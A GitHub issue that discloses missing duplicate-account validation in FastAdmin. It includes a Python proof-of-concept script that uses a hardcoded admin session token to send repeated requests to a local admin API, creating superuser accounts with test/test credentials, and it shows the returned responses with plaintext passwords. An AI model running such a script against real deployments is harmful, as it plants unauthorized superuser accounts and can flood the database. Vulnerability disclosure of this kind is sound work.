Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Duplicate User Accounts: Lack of Validation Allows Multiple Accounts with Same Credentials #93

Open
MatiasTilleriasLey opened this issue Jan 8, 2025 · 1 comment
Open

Duplicate User Accounts: Lack of Validation Allows Multiple Accounts with Same Credentials #93

MatiasTilleriasLey opened this issue Jan 8, 2025 · 1 comment

Comments

@MatiasTilleriasLey
Copy link

Duplicate User Accounts: Lack of Validation Allows Multiple Accounts with Same Credentials

Problem

In the FastAdmin platform, it is possible to create multiple user accounts using the same username and password combination. The system does not enforce uniqueness constraints on user credentials during account creation, allowing duplicate entries.

Impact

  • Security Risks: Duplicate accounts can lead to confusion during audits and make it harder to trace user actions.
  • Data Integrity Issues: Multiple accounts with identical credentials can lead to inconsistencies in the database and unexpected behavior in the application.
  • Abuse Potential: An attacker could exploit this flaw to flood the database with duplicate accounts, potentially causing denial-of-service scenarios.

Steps to Reproduce

  1. Go to the user registration page.
  2. Create an account using a specific username and password (e.g., user1 / password123).
  3. Log out and repeat the registration process using the same username and password.
  4. Observe that the system allows the creation of multiple accounts with identical credentials.

Exploit Code

import requests

cookies = {
    'admin_session_id': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJzZXNzaW9uX2V4cGlyZWRfYXQiOiIyMDI1LTAxLTEwVDA5OjM4OjQwLjA5OTA4NSswMDowMCJ9.8Ma2KRDiFXlIFC2Nrtx2fZb4LcrK1IQvBz6myfYtdrQ',
}

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3',
    'Referer': 'http://127.0.0.1:8090/admin/',
    'Content-Type': 'application/json',
    'Origin': 'http://127.0.0.1:8090',
    'Connection': 'keep-alive',
    'Sec-Fetch-Dest': 'empty',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Site': 'same-origin',
    'Priority': 'u=0',
    'Pragma': 'no-cache',
    'Cache-Control': 'no-cache',
}

json_data = {
    'username': 'test',
    'password': 'test',
    'is_superuser': True
}

for i in range(1,10):
    response = requests.post('http://127.0.0.1:8090/admin/api/add/User', cookies=cookies, headers=headers, json=json_data)

    print(response.text)

Execution Results

The following responses were obtained when running the exploit script, demonstrating the creation of multiple accounts with identical credentials:

{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":14,"created_at":"2025-01-08T18:04:15.144822","updated_at":"2025-01-08T18:04:15.144824","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":15,"created_at":"2025-01-08T18:04:15.149735","updated_at":"2025-01-08T18:04:15.149736","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":16,"created_at":"2025-01-08T18:04:15.154441","updated_at":"2025-01-08T18:04:15.154442","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":17,"created_at":"2025-01-08T18:04:15.159641","updated_at":"2025-01-08T18:04:15.159642","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":18,"created_at":"2025-01-08T18:04:15.164448","updated_at":"2025-01-08T18:04:15.164449","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":19,"created_at":"2025-01-08T18:04:15.169124","updated_at":"2025-01-08T18:04:15.169125","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":20,"created_at":"2025-01-08T18:04:15.173827","updated_at":"2025-01-08T18:04:15.173828","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":21,"created_at":"2025-01-08T18:04:15.178429","updated_at":"2025-01-08T18:04:15.178431","__str__":"test"}
{"events":[],"username":"test","password":"test","is_superuser":true,"avatar_url":null,"id":22,"created_at":"2025-01-08T18:04:15.183273","updated_at":"2025-01-08T18:04:15.183274","__str__":"test"}

imagen
@MatiasTilleriasLey
Copy link
Author

Note: For your information, the tests were conducted using the example project provided in the repository fastapi_sqlalchemy.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@MatiasTilleriasLey